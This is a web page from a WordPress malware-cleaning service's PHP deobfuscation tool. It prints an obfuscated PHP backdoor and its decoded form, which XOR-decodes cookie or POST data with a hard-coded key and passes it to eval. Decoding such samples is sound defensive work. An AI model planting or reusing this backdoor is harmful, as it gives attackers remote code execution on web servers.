Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $mjysd = '8it#vr64\'*o5eamfu9g1dksb7n23yHpx0_cl-'; $yeqvi = []; $yeqvi[] = $mjysd[29] . $mjysd[9]; $yeqvi[] = $mjysd[27] . $mjysd[13] . $mjysd[32] . $mjysd[26] . $mjysd[12] . $mjysd[23] . $mjysd[26] . $mjysd[26] . $mjysd[36] . $mjysd[11] . $mjysd[0] . $mjysd[12] . $mjysd[6] . $mjysd[36] . $...



Obfuscated php code

<?php
$mjysd = '8it#vr64\'*o5eamfu9g1dksb7n23yHpx0_cl-';
$yeqvi = [];
$yeqvi[] = $mjysd[29] . $mjysd[9];
$yeqvi[] =
    $mjysd[27] .
    $mjysd[13] .
    $mjysd[32] .
    $mjysd[26] .
    $mjysd[12] .
    $mjysd[23] .
    $mjysd[26] .
    $mjysd[26] .
    $mjysd[36] .
    $mjysd[11] .
    $mjysd[0] .
    $mjysd[12] .
    $mjysd[6] .
    $mjysd[36] .
    $mjysd[7] .
    $mjysd[7] .
    $mjysd[26] .
    $mjysd[15] .
    $mjysd[36] .
    $mjysd[23] .
    $mjysd[13] .
    $mjysd[20] .
    $mjysd[6] .
    $mjysd[36] .
    $mjysd[19] .
    $mjysd[7] .
    $mjysd[17] .
    $mjysd[19] .
    $mjysd[20] .
    $mjysd[26] .
    $mjysd[15] .
    $mjysd[6] .
    $mjysd[0] .
    $mjysd[17] .
    $mjysd[20] .
    $mjysd[24];
$yeqvi[] = $mjysd[3];
$yeqvi[] = $mjysd[34] . $mjysd[10] . $mjysd[16] . $mjysd[25] . $mjysd[2];
$yeqvi[] =
    $mjysd[22] .
    $mjysd[2] .
    $mjysd[5] .
    $mjysd[33] .
    $mjysd[5] .
    $mjysd[12] .
    $mjysd[30] .
    $mjysd[12] .
    $mjysd[13] .
    $mjysd[2];
$yeqvi[] =
    $mjysd[12] .
    $mjysd[31] .
    $mjysd[30] .
    $mjysd[35] .
    $mjysd[10] .
    $mjysd[20] .
    $mjysd[12];
$yeqvi[] =
    $mjysd[22] . $mjysd[16] . $mjysd[23] . $mjysd[22] . $mjysd[2] . $mjysd[5];
$yeqvi[] =
    $mjysd[13] .
    $mjysd[5] .
    $mjysd[5] .
    $mjysd[13] .
    $mjysd[28] .
    $mjysd[33] .
    $mjysd[14] .
    $mjysd[12] .
    $mjysd[5] .
    $mjysd[18] .
    $mjysd[12];
$yeqvi[] =
    $mjysd[22] . $mjysd[2] . $mjysd[5] . $mjysd[35] . $mjysd[12] . $mjysd[25];
$yeqvi[] = $mjysd[30] . $mjysd[13] . $mjysd[34] . $mjysd[21];
foreach ($yeqvi[7]($_COOKIE, $_POST) as $jrjvo => $flxnx) {
    function akrpta($yeqvi, $jrjvo, $lfhzra)
    {
        return $yeqvi[6](
            $yeqvi[4]($jrjvo . $yeqvi[1], $lfhzra / $yeqvi[8]($jrjvo) + 1),
            0,
            $lfhzra
        );
    }
    function fwavtof($yeqvi, $iptmsq)
    {
        return @$yeqvi[9]($yeqvi[0], $iptmsq);
    }
    function yljyac($yeqvi, $iptmsq)
    {
        $feryg = $yeqvi[3]($iptmsq) % 3;
        if (!$feryg) {
            eval($iptmsq[1]($iptmsq[2]));
            exit();
        }
    }
    $flxnx = fwavtof($yeqvi, $flxnx);
    yljyac(
        $yeqvi,
        $yeqvi[5]($yeqvi[2], $flxnx ^ akrpta($yeqvi, $jrjvo, $yeqvi[8]($flxnx)))
    );
}

Decoded(de-Obfuscated) php code

<?php

$mjysd = '8it#vr64\'*o5eamfu9g1dksb7n23yHpx0_cl-';
$yeqvi = [];
$yeqvi[] = "H*";
$yeqvi[] = "3a02eb22-58e6-442f-bad6-1491d2f689d7";
$yeqvi[] = $mjysd[3];
$yeqvi[] = "count";
$yeqvi[] = "str_repeat";
$yeqvi[] = "explode";
$yeqvi[] = "substr";
$yeqvi[] = "array_merge";
$yeqvi[] = "strlen";
$yeqvi[] = "pack";
foreach (array_merge($_COOKIE, $_POST) as $jrjvo => $flxnx) {
    function akrpta($yeqvi, $jrjvo, $lfhzra)
    {
        return $yeqvi[6]($yeqvi[4]($jrjvo . $yeqvi[1], $lfhzra / $yeqvi[8]($jrjvo) + 1), 0, $lfhzra);
    }
    function fwavtof($yeqvi, $iptmsq)
    {
        return @$yeqvi[9]($yeqvi[0], $iptmsq);
    }
    function yljyac($yeqvi, $iptmsq)
    {
        $feryg = $yeqvi[3]($iptmsq) % 3;
        if (!$feryg) {
            eval($iptmsq[1]($iptmsq[2]));
            exit;
        }
    }
    $flxnx = fwavtof($yeqvi, $flxnx);
    yljyac($yeqvi, $yeqvi[5]($yeqvi[2], $flxnx ^ akrpta($yeqvi, $jrjvo, $yeqvi[8]($flxnx))));
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.